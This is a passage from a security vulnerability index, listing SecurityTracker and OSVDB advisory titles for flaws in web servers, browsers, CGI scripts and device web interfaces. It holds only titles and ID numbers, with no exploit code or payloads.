Execute Arbitrary Code on the Web Server [1003254] Quiz Me! Testing Script May Allow Remote Users to Execute Arbitrary Code on the Web Server [1003253] Mike's Vote CGI Survey Script Bug Allows Remote Users to Execute Arbitrary Code on the Web Server [1003251] Sapporo Works 'BlackJumboDog' Web Proxy Buffer Overflow Lets Remote Users Execute Arbitrary Code on the Host Running the Proxy [1003246] Sambar Web Server Sample CGI Allows Remote Users to Crash the Web Server [1003239] Python Language Implementation on Microsoft Windows Allows a Remote Server to Access Files on a Web Surfing User's PC [1003228] Microsoft Windows Media Player Discloses Unique ID to Remote Users in the Default Configuration, Allowing Web Sites to Track Users [1003222] ZBServer Pro Web Server Can Be Crashed By Remote Users Sending Long URL GET Requests Several Times [1003220] Web Server 4D/eCommerce Discloses Files Located Anywhere on the Server to Remote Users [1003219] Web Server 4D/eCommerce Can Be Crashed By Remote Users Sending a Few Long URL GET Requests [1003210] Pi3Web HTTP Server Can Be Crashed By Remote Users Sending Long CGI Parameters [1003175] Dino's Webserver Directory Traversal Flaw Lets Remote Users Obtain Files Located Anywhere on the Server [1003173] EServ Web Server Discloses Password-Protected Files and Directories to Remote Users [1003169] Allaire Forums Web Bulletin Board Authentication Flaw Lets Remote Users Impersonate Other Users on the Board [1003156] iPlanet Web Server Publishing Feature Allows Remote Users to Conduct Brute Force Password Guessing Attempts [1003155] iPlanet Web Server Can Be Crashed By Remote Users Sending a Certain Publishing Command [1003152] BEA WebLogic Server Can Be Crashed By Remote Users Sending Multiple Requests for DOS Devices. [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory [1003125] Hosting Controller Windows-based Web Hosting Management Software Lets Remote Users Establish Administrator Accounts and Upload and Execute Arbitrary Code on the Server [1003124] Multiple Bugs in Savant Webserver Allow Certain Remote Requests to Cause Denial of Service Conditions and Other Requests to Be Processed Without Being Logged [1003117] Geeklog Web-based Community Portal Software May Let a Remote User Obtain Administrative Priviliges on the Application [1003116] PHPFileExchange Web-Based File Storage System Has Access Control Bug That Allows Remote Users With Valid Accounts to Upload Files to Read-Only Directories [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error [1003103] Anti-Web HTTPD (awhttpd) Web Server Can Be Crashed By Local Users [1003074] Cherokee Web Server Discloses Any File Located on the Web Server to Remote Users [1003073] Oracle Application Server Web Cache Can Be Crashed By Remote Users Sending Certain GET Requests Containing NULL Characters or Period Characters [1003072] Oracle Application Server Web Cache Installation File Permission Error Lets Local Users Obtain Elevated Privileges [1003069] Vim Text Editor Backup File Configuration Errors May Let Remote Users View the Source Code of Web Scripts That Have Been Edited With the VIM Editor [1003063] Lynx Web Browser Format String Flaw Lets Remote Web Sites (URLs) Execute Arbitrary Commands on the Host in a Certain Configuration [1003061] Lynx Web Browser SSL Security Flaw Lets Remote Users Conduct Man-in-the-Middle Attacks to Access Sensitive Information [1003060] KDE Konqueror Web Browser SSL Security Flaw Lets Remote Users Conduct Man-in-the-Middle Attacks to Access Sensitive Information [1003056] AdStream Banner Management CGI System Calls Let Remote Users Execute Arbitrary Commands on the Web Server [1003050] Microsoft Internet Explorer Web Browser Can Be Crashed By Malicious Image Source Tag Javascript Supplied By Remote Users [1003046] AdRotate Pro Perl-based Banner Management Utility Has Input Validation Flaw That Lets Remote Users Modify the Underlying Database and May Let Remote Users Execute Arbitrary Code on the Web Server [1003042] Microsoft Internet Explorer Web Browser SSL Security Flaw Lets Remote Users Conduct Man-in-the-Middle Attacks to Access Sensitive Information [1003039] Mozilla Web Browser Can Be Crashed By Malicious Image Source Tag Javascript Supplied By Remote Users [1003024] Microsoft Internet Explorer (IE) Web Browser 'document.open()' Scripting Flaw Lets Remote Users Steal Cookies, Read Local Files, and Spoof Web Sites [1003012] Novell NetWare Enterprise Web Server Discloses the Contents of Any File to Remote Users, Including the Console Password [1003007] Webmin Web-Based System Management Tool Gives Remote Users Root Level Access [1003001] Webmin Management Tool Lets Valid Remote Users View and Edit Files on the Web Server [1002991] Manual.php Script for Displaying UNIX Man Pages Lets Remote Users Execute Arbitrary Code on the Web Server [1002988] Tivoli SecureWay Policy Director WebSEAL Server Can Be Crashed By Remote Users Appending '%2e' to HTTP Requests [1002984] Webglimpse Search Engine Software May Allow Remote Users to Execute Arbitrary Code on the Server [1002973] Microsoft Internet Explorer (IE 6) Browser May Automatically and Silently Execute Arbitrary Code from a Remote Web Site When the User Views a Web Page or HTML-based E-mail [1002970] ATPhttpd Web Server Can Be Crashed By Remote Users Sending Long URLs [1002964] IBM WebSphere Discloses Administration Server 'Root' Password to Local Users [1002941] CSVForm Perl Script Input Validation Bug Lets Remote Users Execute Arbitrary Code With the Privileges of the Web Server [1002928] Kebi Webmail Server Gives Remote Users Access to Administrative Functions Via a 'Hidden' URL [1002927] Lotus Domino With Web Server Has Denial Of Service Bug That Lets Remote Users Lock Databases or Cause the Service to Crash With Malformed URLs [1002915] Microsoft Outlook Web Access for Exchange May Execute Remotely Supplied Scripts When a Recipient Views a Malicious E-mail Message [1002880] Lotus Domino Secure Web Server Can Be Crashed By Remote Users [1002871] PGPMail Perl Script Does Not Filter User Input and Lets Remote Users Execute Arbitrary Commands on the Web Server [1002868] WoltLabs Burning Board PHP-based Forum Discloses the Web Root Directory Locatoin [1002857] Network Associates WebShield SMTP Anti-Virus Gateway Fails to Block BadTrans Virus Due to Errors in Processing the MIME Header [1002838] Allaire's JRun Java Server Discloses JSP Source Code to Remote Users When Used As a Connector With Commercial Web Servers [1002837] Allaire JRun Java Server Discloses Web Server Directory Contents to Remote Users Requesting URLs Containing '%3f.jsp' [1002834] Sendpage.pl CGI Script Lets Remote Users Execute Commands on the Web Server [1002827] Xitami Web Server Discloses Web Server Administrator Password to Local Users, Which Could Lead to Root Compromise [1002821] iODBC Open DataBase Connectivity Library Buffer Overflow May Let Remote Users Execute Arbitrary Code When Used With a Web Server [1002820] Microsoft Internet Explorer Allows Malicious Web Pages to Spoof Downloadable File Types And Execute Code on the User's Computer When Opened Directly from the Browser [1002818] Oracle9iAS Web Cache Can Be Crashed By Remote Users Sending Malformed HTTP Content Length Header [1002812] Red Hat Stronghold Secure Web Server Discloses Sensitive System Files to Remote Users [1002806] SuSE Linux Susehelp CGI Scripts Allow Remote Users to Execute Arbitrary Commands With the Privileges of the Web Server [1002805] Netscape Browser for MacOS Discloses HTML Web Form Password Contents to Local Users [1002797] Opera Web Browser May Disclose Passwords Typed into an HTML Form to Local Users [1002783] Thttpd Web Server Has a One Byte Buffer Overflow That Allows Remote Users to Execute Arbitrary Code [1002778] Microsoft Internet Information Server (IIS) Lets Remote Users Create Bogus Web Log Entries [1002777] Hypermail Web-based E-mail Archive Lets Remote Users Execute SSI Commands on the Server [1002773] Titan Application Firewall for IIS Web Server Fails to Decode URLs, Letting Remote Users Bypass URL-based Firewall Restrictions [1002770] Gallery Web Photo Gallery Software for PHPNuke Discloses Files on the Server to Remote Users [1002759] Opera Web Browser May Disclose Web Pages, Cookies, and Links from a Separate Domain to a Remote Server Running Malicious Javascript Code [1002753] NeoMail Web-based Mail Client Package for Sun Cobalt RaQ and Cube Appliances Contains Suidperl Vulnerability That Lets Remote Users Gain Root Privileges [1002743] mini_httpd Web Server Discloses Password-Protected and Non-Readable Files to Remote Users [1002742] thttpd Web Server Discloses Password-Protected and Non-Readable Files to Remote Users in Certain Configurations [1002695] Red Hat Tux Kernel-based Web Server Can Be Crashed By Remote Users Sending Oversized Host Field [1002669] Lotus Domino Web Server Default Navigation Protection Mechanisms Can Be Bypassed by Remote Users, Allowing Some Portions of the Database to be Viewed [1002668] Lotus Domino Web Administrator Template Access Control Flaw Lets Remote Users Gain Some Web Administrator Privileges [1002667] Web Crossing Discussion and Chat Software Uses Weak Session Authentication That Allows Remote Users to Hijack User Sessions [1002660] Seth Leonard's Post It! CGI Script Meta-Character Filtering Hole Lets Remote Users Execute Arbitrary Shell Commands on the Web Server [1002659] Seth Leonard's Book of Guests CGI Script Meta-Character Filtering Hole Lets Remote Users Execute Arbitrary Shell Commands on the Web Server [1002640] RSA SecurID ACE/Agent Unicode Vulnerability Lets Remote Users View Files and Possibly Execute Programs on the WebID Server Without Authenticating [1002637] Webalizer Log File Analyzer Cross-Site Scripting Hole Allows Remote Users to Cause Arbitrary But Trusted Code to Be Executed By Another User When Viewing Webalizer Reports [1002615] Webmin Creates Insecure Temporary Files That Can Be Modified By Local Users to Cause Webmin to Execute Arbitrary Commands with Root Level Privileges [1002602] Mountain Network Systems WebCart Lets Remote Users Execute Arbitrary Commands on the Web Server [1002582] Oracle9iAS Web Cache Allows Remote Users to Execute Arbitrary Code or Cause the Caching Process to Exit or Hang [1002560] Internet Explorer Sends Potentially Sensitive Web Browser Contents to Microsoft via the Network When an Error Occurs [1002549] Novell GroupWise WebAccess Discloses Files to Remote Users [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System [1002541] Post-Nuke Web Portal Software Authentication Flaw Lets Remote Users Access User Accounts Without Requiring the Password [1002540] Ipswitch's IMail Server's Web Calendaring Function Has Buffer Overflow That Lets Remote Users Execute Arbitrary Code with System Level Privileges [1002526] Microsoft Internet Explorer (IE) Web Browser Has Multiple URL-related Flaws That May Allow for Remote Code Execution, Remote HTTP Request Generation, and Application of Incorrect Security Restrictions [1002511] W3Mail Web Mail Front End Has Metacharacter Input Validation Flaw that Lets Authenticated Remote Users Execute Arbitrary Shell Commands on the Server [1002505] ZorbStats PHP-based Web Statistics Generator Allows Remote Users to Execute Arbitrary Code on the Server [1002504] Webodex PHP-based E-mail List Management Software Executes Remotely Supplied Code [1002503] Gallery PHP-based Web Photo Gallery Software Permits Remote Users to Supply and Execute Arbitrary Code [1002502] thatphpware PHP-based Web Portal Software Allows Remote Users to Execute Arbitrary Code [1002501] SIPS PHP-based Web Log Tracking System Will Execute Remotely Supplied Arbitrary Code [1002500] pSplash Web Portal Software Lets Remote Users Execute Arbitrary Code [1002493] DarkPortal PHP-based Web Portal Lets Remote Users Supply and Execute Arbitrary Code [1002480] BestWWWD Web Server Lets Remote Users Execute Shell Commands on the Server [1002467] COM2001's Alexis Internet-enabled PBX Discloses Voice Mail Passwords When the Web Access Component is Used Over a Network [1002462] CardBoard Greeting Card CGI Application Lets Remote Users Execute Arbitrary Commands on the Web Server [1002460] H-Sphere Web Hosting Software Discloses Files on the System to Remote Users with Valid Web Management Accounts [1002456] Microsoft Outlook Web Access Directory Validation Flaw Lets Remote Users Consume CPU Resources by Requesting Mail from Nested Folders [1002444] Lotus Domino Web Server Discloses Internal Network Address to Remote Users [1002442] XCache Web Caching Server Discloses Path Names for Web Documents to Remote Users [1002437] IBM WebSphere Application Server Uses Predictable Session ID Cookies, Allowing Remote Users to Guess Session IDs and Hijack Web Sessions [1002434] ICQ Web Portal Cross-Site Scripting Vulnerability May Allow Remote Users to Cause Arbitrary Code to Be Executed by a Target User's Browser via the ICQ Web Site [1002427] Webdiscount.net's eshop Commerce System Lets Remote Users Execute Arbitrary Commands on the System and Gain Shell Access [1002404] Textor's Listrec.pl Web Content Management CGI Script Allows Remote Users to Execute Code With the Privileges of the Web Server [1002395] Cgiemail Web-based E-mail Remotely Executes Arbitrary Code With the Privileges of the Web Server [1002393] Hotmail Web E-mail Service Allows Remote Users to Cause Malicious Javascript to be Executed by the Recipient's Browser, Potentially Stealing Authentication Cookies [1002386] Mac OS X Discloses Directory Contents to Remote Users When Running a Web Server [1002340] WEBsweeper Content Security Software's URL Restrictions Can Be Bypassed By Remote Users [1002336] Outlook Web Access Discloses Global Address List to Remote Users [1002331] Internet Security Systems RealSecure Intrusion Detection Misses '%u' Encoded Attacks Against Microsoft Web Servers [1002330] Cisco Catalyst 6000 Intrusion Detection System Module Fails to Detect '%u' Encoding Obfuscation Attacks Against Microsoft Web Servers [1002329] Dragon Sensor Intrusion Detection System Does Not Detect Certain Attacks Against Microsoft Web Servers [1002327] Snort Network Intrusion Detection System Will Not Detect '%u' URL Encoding Attacks Against Microsoft Web Servers [1002326] Cisco Secure Intrusion Detection System (NetRanger) Fails to Detect Certain Attacks Against Microsoft Web Servers [1002325] Marconi ASX Series ATM Switches Allow Remote Users to Crash the Telnet Administrative Interface [1002322] WebShield E-mail Scanner Lets Remote Users Get User-Level Operating System Access [1002314] Basilix Web Mail Server Will Execute Commands Supplied By Remote Users [1002297] Tripwire for Web Pages Discloses Information to Remote Users [1002269] Microsoft Outlook Web Access with SSL Can Be Crashed by Remote Users [1002259] Trend Micro Office Scan Has Remote Web Management CGI That Lets Remote Users View Arbitrary Files on the Server [1002255] Trend Micro Virus Buster Has Remote Web Management CGI That Lets Remote Users View Arbitrary Files on the Server [1002254] A-V Tronic's Inetserv Web Mail Server Buffer Overflow Vulnerabilities Let Remote Users Crash the System or Execute Arbitrary Code with System Level Privileges [1002246] Cisco 600 Series DSL Routers (CBOS Operating System) Can Be Crashed By Remote Users Via Administrative Interface [1002233] BadBlue Web Server Discloses PHP Source Code to Remote Users [1002232] 4D Web Server Discloses All Files on the Drive to Remote Users [1002212] Microsoft IIS Web Server Contains Multiple Vulnerabilities That Allow Local Users to Gain System Privileges and Allow Remote Users to Cause the Web Server to Crash [1002210] Novell GroupWise WebAccess Discloses Directory Index Listings to Remote Users Instead of the Index.html File [1002209] NetWare Enterprise Server Web Server for NetWare 5.x Discloses User Names, Group Names, and Other Information to Remote Users [1002203] Webridge PX Application Suite Discloses Internal Information to Remote Users [1002195] SIX Webboard Discloses Any World-Readable File on the Server to Remote Users [1002192] Baltimore Technologies WEBsweeper Lets Remote Users Send Malicious Code That Will Bypass Content Security Restrictions [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations [1002181] Several Bugs in PHP-Nuke Let Remote Users Take Administrative Control of the Web Portal or Cause the Site to Crash [1002161] Microsoft Internet Information Server (IIS) Web Server Discloses Internal IP Addresses or NetBIOS Host Names to Remote Users [1002135] Roxen Web Server Discloses Files on the Server to Remote Users and May, in Certain Configurations, Let Remote Users Execute Any Program on the Server [1002124] Microsoft Windows 98 Operating System Can Be Crashed When Running a Web Server or Other Servers And the AUX Device is Accessed By the Program [1002101] Window Maker X11 Window Manager Contains a Buffer Overflow that May Execute Arbitrary Code or Crash When Viewing a Malicious Web Page or E-mail Message [1002082] Sambar Web Server Lets Remote Users Modify Files on the Server [1002074] Proxomitron Web Filtering Proxy Allows Remote Users to Conduct Cross-site Scripting Attacks and Cause Arbitrary Code to be Executed by the Proxomitron Users' Browser, Possibly Disclosing Cookies [1002068] Tivoli SecureWay Policy Director WebSEAL Server Discloses Files on Multiple Web Servers to Remote Users [1002038] Sambar Server's Web Server Lets Local Users Disclose Files Outside of the Documents Directory [1002035] Un-CGI Web Form Preprocessor Discloses Files on the System to Remote Users and Executes Non-executable Files [1002034] Caldera Docview Documentation Web Server Lets Local Users Gain Httpd User Account Privileges [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory [1001964] IBM's Net.Data Web Scripting Language May Disclose Sensitive SQL Query Parameters to Remote Users [1001963] Opera Web Browser Can Be Crashed By a Malicious Web Server [1001956] Xloadimage Used By Netscape Browser May Execute Arbitrary Code Specified By a Malicious Remote Web Server [1001944] BasiliX Web Mail Server Lets Remote Users Read Files on the System [1001934] Cobalt Cube WebMail Lets Remote Users Traverse Directories and Obtain Files on the Server [1001915] LiteWebServer Discloses JSP Source Code to Remote Users [1001912] Resin Web Server Lets Remote Users Cause Arbitrary Javascript to be Executed by Another User's Browser [1001911] Lotus Domino Web Server Lets Remote Users Cause Arbitrary Javascript to be Executed by Another User's Browser [1001904] vWebServer for Windows Discloses ASP Source Code to Remote Users and Can Be Crashed Remotely [1001903] IBM WebSphere Java Application Server Lets Remote Users Cause Arbitrary Javascript to be Executed by Another User's Browser [1001899] Another Buffer Overflow in TrendMicro's InterScan Web Manager Gateway Lets Remote Users Execute Arbitrary Code with System Level Privileges [1001897] Citrix NFuse Web Application Discloses the Full Installation Path to Remote Users [1001893] Another Buffer Overflow in GazTek ghttpd Web Server Lets Remote Users Execute Arbitrary Code on the Server [1001873] Apple Mac OS Personal Web Sharing Can Be Crashed with Long Passwords from Remote Users [1001870] Active Classifieds Web Software Lets Remote Users Run Arbitrary Code on the Server [1001831] Perception LiteServe Web Server Discloses CGI Script Source Code to Remote Users [1001818] Microsoft Internet Information Server (IIS) Web Server Discloses ASP Source Code When Installed on FAT-based Filesystem [1001811] 1C:Arcadia Internet Store Web Commerce System Discloses Files to Remote Users and Lets Remote Users Crash the Application [1001805] TrendMicro's InterScan Web Manager Gateway Lets Remote Users Obtain System-Level Access to the Server [1001803] w3m Text-based Web Browser May Execute Arbitrary Code [1001801] SurfControl's SuperScout Web Filter Fails to Block Packets Relayed Via Proxy Servers [1001779] Tarantella Application Web Server Discloses Files on the Server to Remote Users [1001772] GazTek ghttpd Web Server Executes Arbitrary Code Supplied By Remote Users [1001748] ScreamingMedia's SiteWare Web Publishing System Lets Remote Users View Any Files on the Server [1001743] Anonymizer Anonymous Web Browsing Service Fails to Block Some Javascript, Allowing Javascript to Disclose the Anonymous User's Information [1001739] BiblioWeb Server Can Be Crashed By a Remote User Sending a Long URL [1001737] WebStore Shopping Cart Allows Remote Users to Execute Commands on the Server [1001730] Gmx.net Web-Based E-mail System Lets Remote Users Execute Arbitrary Code on the User's Browser [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages [1001712] Caldera's Volution Web-Based Management System May Permit a Rogue Volution System to Take Control of Volution Clients on the Network [1001707] VirtualCatalog Commerce Application Discloses Script Source Code to Remote Users and Lets Remote Users Execute Certain Commands via the Web Server [1001699] Microsoft Internet Explorer Web Browser May Allow Remote Users to Read Some Text Files on the Browser's Hard Drive [1001696] Microsoft Exchange Server's Outlook Web Access (OWA) Lets Remote Users Execute Arbitrary Code on the OWA User's Web Browser [1001686] Netscape Messenger E-mail Client Discloses Some User Information to Remote Web Sites [1001680] ChatSpace (O'Reilly) WebBoard Lets Remote Users Execute Arbitrary Javascript Code [1001676] WebTrends Enterprise Reporting Server Discloses Source Code of Scripts on the Web Server [1001662] Acme.Serve Java-based Web Server Lets Remote Users Read All Files on the Server [1001658] Internet Messaging Program (IMP) Web-based E-mail System Allows Local Users to Write Arbitrary Contents to Existing Files on the Server [1001656] Cisco 11000 Series Content Service Switch Allows Remote Users to Gain Access to Web-Based Management Functions Without Authentication [1001641] WebAvail's LinkMax2 ASP-based Link Indexing Script Lets Remote Users Access the Administrative Script Without Authentication [1001630] TWIG Webmail Allows Authorized Remote Users to Make Unauthorized Modifications to Another User's Data on the Database Server [1001629] Directory Pro CGI-based Web Directory Management Tool Lets Remote Users Obtain Files on the Server [1001627] Webmin System Administration Tool May Allow Remote Users to Obtain the Webmin Password [1001623] SpearHead's NetGAP Security Appliance Allows Remote Users to Bypass the Web Content Filtering Engine [1001618] OmniHTTP Web Server Allows Remote Users to Obtain Source Code of PHP Scripts and to Cause the Server to Consume All CPU Cycles [1001608] Beck IPC's IPC@CHIP Embedded Web Server Contains Multiple Flaws Allowing Remote Users to Crash the Server and Obtain Sensitive Information from the Server, Including Usernames and Passwords [1001576] eEye Digital Security's SecureIIS Application Firewall for Microsoft Web Servers Fails to Filter Certain Web URL Characters, Allowing Remote Users to Bypass the SecureIIS Firewall [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server [1001565] Microsoft IIS Web Server on Windows 2000 Allows Remote Users to Cause the Server to Consume All Available Memory Due to Memory Leak in WebDAV Lock Method [1001562] Microsoft Internet Explorer Allows Remote Web Sites to Cause a Different Web URL Address to Be Displayed in the Browser's Address Bar, Allowing Rogue Web Sites to Spoof the Browser and Masquerade as Different Web Sites [1001561] Microsoft Internet Explorer Web Browser Fails To Validate Digital Certificates in Some Configurations, Allowing Rogue Secure Web Sites to Spoof the Browser and Masquerade as a Different Secure Web Site [1001558] PHPSlash Lets Remote Administrators View Files on the Server Located Outside of the Web Document Root Directory [1001555] OmniHTTPd Pro Web Server Can Be Crashed By Remote Users [1001551] DCForum Web Messaging Board Software Lets Remote Users Gain DCForum Administrator Privileges and Execute Arbitrary Code on the Server [1001541] iPlanet Web Server Allows Remote Users to Execute Arbitrary Code on the Server and to Crash the Server [1001540] MacOS Personal Web Sharing Can Be Crashed By Remote Users [1001538] Older Version of Microsoft Internet Explorer Web Browser Can Be Crashed By Remote Users [1001530] Microsoft IIS Web Server Allows Remote Users to Execute Commands on the Server Due to CGI Decoding Error [1001525] Earlier Version of LiteServe Web Server for Windows Can Be Crashed By Remote Users [1001519] Zope Dynamic Web Content Management Tool May Allow Remote Users to Access Certain Unauthorized Data [1001492] A1-Stats Web Server Traffic Monitoring Statistics Package Lets Remote Users View Files Anywhere on the Server and Overwrite the Contents of Some Existing Files [1001491] MP3Mystic MP3 Web Server Lets Remote Users Browse Files Located Anywhere on the Server [1001483] Microsoft IIS Web Server Lets Remote Users Restart the Web Server with Another Specially Crafted PROPFIND XML Command [1001477] iScouter PHP-based Web Portal System Lets Remote Users Access Database Passwords [1001462] Bugzilla Web-Based Software Bug Tracking Tool Allows Remote Users to Execute Arbitrary Shell Commands on the Server [1001457] SAP R/3 Web Application Server Demo Allows Local Users to Gain Root Level Access [1001455] BRS WebWeaver Web Server Allows Remote Users to Obtain Any File on the Server [1001452] ICQ Web Front Plugin for the ICQ Chat Program Allows Remote Users to Crash the Web Server With Malformed Packets [1001450] PerCal Web Calendar Software Allows Remote Users to View Files on the Server [1001440] WebXQ Web Server From DataWizard Technologies Allows Remote Users to Access Files Outside of the Server's Web Root Directory [1001429] Perl Web Server Lets Remote Users Access Files and Directories Outside of the Web Server's Web Root Directory [1001425] NetCruiser Web Server Displays Physical Path Information For Certain URLs [1001414] Viking Web Server Discloses Files Outside of the Web Root Directory to Remote Users Due to Relative Path Vulnerability [1001413] WebCalendar Allows Remote Users to Execute PHP Commands on the Server Without Authentication [1001410] SquirrelMail Web-Based Mail Software Allows Remote Users to Execute PHP Commands on the Server [1001402] Microsoft IIS Web Server Can Be Effectively Shutdown By Certain Internal-Network Attacks When The Underlying OS Supports User Account Lockouts [1001400] Opera Web Browser May Execute Files Selected for Download Instead of Prompting the User for Approval [1001349] AnalogX's Simple Server:WWW Web Server Can Be Crashed By Remote Users [1001348] iMatix's Xitami Web Server Allows Remote Users to Crash the Web Server [1001345] Viking Server Discloses Files Outside of the Document Directory to Remote Web Users [1001343] MyServer Java-based Web Server Can Be Crashed By Remote Users [1001342] GoAhead Web Server Can Be Crashed By Remote Users [1001338] iPlanet Web Server Allows Remote Users to Corrupt Data on the Server and May Allow Remote Users to Execute Arbitrary Code on the Server [1001337] IBM's Domino Web Server May Disclose Physical Path Information to Remote Users [1001332] DCScript's DCForum Web Messaging Board Software Allows Remote Users to Cause the Software to Execute Arbitrary Code [1001305] IBM WebSphere NetCommerce Server Discloses File Path Names and Can Be Crashed By Remote Users [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application [1001296] MarkeTrend's nph-maillist.pl CGI Script Lets Remote Users Execute Commands on the Web Server [1001290] Compaq Presario Computers May Allow Malicious Web Pages to Write Arbitrarily Named Files to Be Written to the Hard Drive Without Authorization [1001284] A Share Library in Oracle's Application Server and Used by the iPlanet Web Server Allows the Web Server to be Crashed By Remote Users [1001274] Netscape 4.76 Browser May Execute Arbitrary Javascript Code that Could Disclose Recently Visited Web URLs [1001271] TalkBack CGI Script Discloses the TalkBack Administrator Password and Allows Remote Users to View Files on the Web Server [1001248] Savant Web Server Can Be Crashed Remotely With Certain HTTP Requests [1001234] Resin Web Servlet and Java Engine Discloses JavaBean Contents to Remote Users [1001215] WebSPIRS CGI By SilverPlatter Allows Remote Users to View Files Outside of the Web Server's Root Directory [1001212] CrazyWWWBoard CGI Allows a Remote User to Execute Arbitrary Code on the Web Server [1001210] Microsoft Internet Explorer Allows Malicious Web Pages to Retrieve Files from the User's Computer [1001206] Earlier Versions of BEA's WebLogic Web Server May Reveal Script Source Code [1001195] IBM's WebSphere Commerce Suite and Application Server Disclose the Source Code for JavaServer Pages [1001194] Sun's JavaServer Web Development Kit Allows Remote Users to Access Files Outside the Document Root Directory [1001189] Infradig's Inframail Web Server Can Be Crashed Remotely Using Malformed POST Requests [1001188] O'Reilly WebSite Pro's Remote Manager Service Can Be Crashed Via the Network [1001187] Microsoft Internet Explorer Is Vulnerable to Malicious Web Pages That May Obtain the User's Exchange E-mail Messages and May Access Restricted Web Server Directory Listings [1001169] Anaconda! Foundation Clipper Gives Remote Users Unauthorized Access to Files Anywhere on the Web Server [1001161] WebLogic Web Server By BEA Systems Allows Remote Users to Browse Web Directories [1001157] Pwc CGI Code May Execute Arbitrary Code Supplied Via the Web [1001149] Nearly All of Compaq's Web-Enabled Management Software Inadvertently Acts As a Web Proxy Server, Allowing Web Surfers to Bypass Normal Proxy Server Filtering [1001131] Gordano's NTMail Mail Server Web Services Can Be Crashed Remotely By Any User Sending a Long URL Request [1001121] O'Reilly's WebSite Pro Contains A Vulnerability That Reveals the Physical Path of the Web Directory to Remote Users [1001116] Microsoft Personal Web Server Contains An Old Internet Information Server (IIS) Vulnerability Allowing Unauthorized Directory Listings and Possible Code Execution For Remote Users [1001108] FormMail.pl Web-to-Email CGI Script Allows Unauthorized Users to Send Mail (e.g., spam) Anonymously [1001089] vBulletin Web-Based Bulletin Board Allows Remote Users to Execute Arbitrary Code on the Server [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled [1001078] INDEXU Web Portal Content Management System Allows Users to Obtain Administrator Access to the Management System [1001077] Savant Web Server v3.0 Can Be Crashed Remotely With a Malformed Request [1001066] Websweeper From Baltimore Technologies Can Be Crashed Remotely Because It Does Not Limit The Size of Web Requests [1001050] Microsoft IIS 5.0 Web Server Can Be Restarted Remotely By Any User [1000992] WhitSoft's SlimServe HTTPd Web Server Gives Users Remote Access to Files Outside of the Server's Main Directory [1000983] PHP-Nuke Web Site Management Software Allows Unauthorized Commands to Be Executed [1000945] BadBlue's Windows-Based Web Server Can Be Crashed Via the Network and May Display Full Path Names [1000943] Thinking Arts ES.One Commerce Package Allows Unauthorized File and Directory Listings Outside of the Web Root Directory [1000942] Resin Web Servlet and Java Engine Allows Unauthorized Access to Directories and Files Outside of the Web Root Directory [1000941] Pi3Web Server Reveals Directory Path Information And May Execute Arbitrary Code OSVDB - http://www.osvdb.org: [96132] Huawei Tecal RH2285 V2 Web Interface Unspecified Authentication Bypass [95878] Cisco Multiple Content Network / Video Delivery Products Web Framework Command Line Interface Remote Command Execution [95622] Foscam FI8620 PTZ Camera Web Interface Open Directory Information Disclosure [95583] Cisco Unified MeetingPlace Web Conferencing Crafted HTTP Request Handling Web Interface Access Restriction Bypass Unspecified Information Disclosure [95199] Cisco Secure Access Control System (ACS) Web Interface Unspecified XSS [95101] Dell iDRAC6 Web Interface testurls.html CLP Interface Manipulation [94140] VLC Media Player Web Interface XML Services Remote Command Execution [94139] VLC Media Player Web Interface XML Services XSS [94054] Cisco Aironet Web Interface Default Admin Credentials [93719] Ruckus ZoneDirector Controllers Admin Web Interface Unspecified Authentication Bypass [93681] Siemens Scalance X200 IRT Switches Web Interface Unspecified Remote Command Execution [93679] Octopussy Web Interface Multiple Unspecified Issues [93634] AirLink GW-200 Web Interface Default Admin Credentials [93466] Huawei VP9610 / VP9620 Web Interface Session Fixation [93409] Cisco Secure Access Control Server (ACS) Web Interface Session Fixation [93280] 3com OfficeConnect VPN Firewall Web Interface Default Password [93278] Barracuda CudaTel Communication Server Web Interface Default Admin Credentials [93276] MultiTech RouteFinder RF850 / RF860 Internet Security Appliance Web Interface Default Admin Credentials [93275] SonicWall TZ Series Firewall Web Interface Default Admin Credentials [93191] AIRAYA WirelessGRID Outdoor Bridge Web Interface Default Admin Credentials [92989] EMC Avamar Server Web Based File Restore Interface Crafted URL Handling Arbitrary File Access [92822] HP Proactive Remote Service (PRS) Compaq Remote Service Module (CRSM) Web Interface Privileged File Access [92785] BT Home Hub Web Management Interface 'Accessible Access Points Table' Page SSID Handling XSS Weakness [92766] Cisco Unified Computing System Manager Web Interface Technical Support / Local Backup File Information Disclosure [92555] NETGEAR WNDR4700 Web Interface BRS_03B_haveBackupFile_fileRestore.html Unrestricted Access Authentication Bypass [92529] Novell GroupWise WebAccess Interface onError Attribute XSS [92508] Sitecom WLM-3500 Web Interface /romfile.cfg Admin Password Cleartext Remote Disclosure [92507] Sitecom WLM-3500 Web Interface Multiple Hardcoded Deafult Passwords [92313] Schneider Electric Spectra Cameras Malformed Authentication String Web Interface / SOAP Service Remote DoS [92116] AirDroid Application for Android Web Interface Managed Phone Crafted Text Message XSS [91457] Polycom HDX Web Interface Firmware Update puputils.ppc PUP File Upload Handling Remote Command Execution [91327] Citrix Web Interface Authentication Failure Message XSS [91050] GroundWork Monitor Enterprise Foundation Admin Interface /foundation-webapp/admin/manage-properties.jsp XSS [91049] GroundWork Monitor Enterprise Foundation Admin Interface /foundation-webapp/admin/manage-performanceDataLabel.jsp XSS [91048] GroundWork Monitor Enterprise Foundation Admin Interface /foundation-webapp/admin/manage-hostgroups.jsp XSS [90952] IBM Tivoli Application Dependency Discovery Manager (TADDM) Data Management Portal Web User Interface Unspecified XSS [90821] Foscam IP Cameras Web Interface Traversal Arbitrary File Access [90616] IBM System Storage TS3500 Tape Library Web Interface Admin Authentication Bypasss [89819] QTech QFC-P8S2xxH2 Web Interface Default Admin Credentials [89818] Dataprobe iBoot-G2 Power Switch Web Interface Default Admin Credentials [89816] Dataprobe iBootBar Web Interface Default Admin Credentials [89633] IBM InfoSphere Information Server Multiple Web Interface Unspecified XSS [89375] RuggedCom Rugged Operating System 